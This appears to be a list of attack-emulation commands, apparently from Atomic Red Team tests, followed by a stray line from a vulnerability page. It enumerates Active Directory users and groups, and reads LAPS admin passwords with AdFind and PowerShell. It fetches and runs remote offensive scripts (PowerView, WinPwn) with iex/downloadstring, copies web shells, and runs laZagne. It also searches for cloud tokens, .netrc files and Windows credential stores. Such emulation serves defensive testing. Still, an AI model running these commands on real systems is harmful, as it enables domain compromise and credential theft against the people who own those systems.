ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.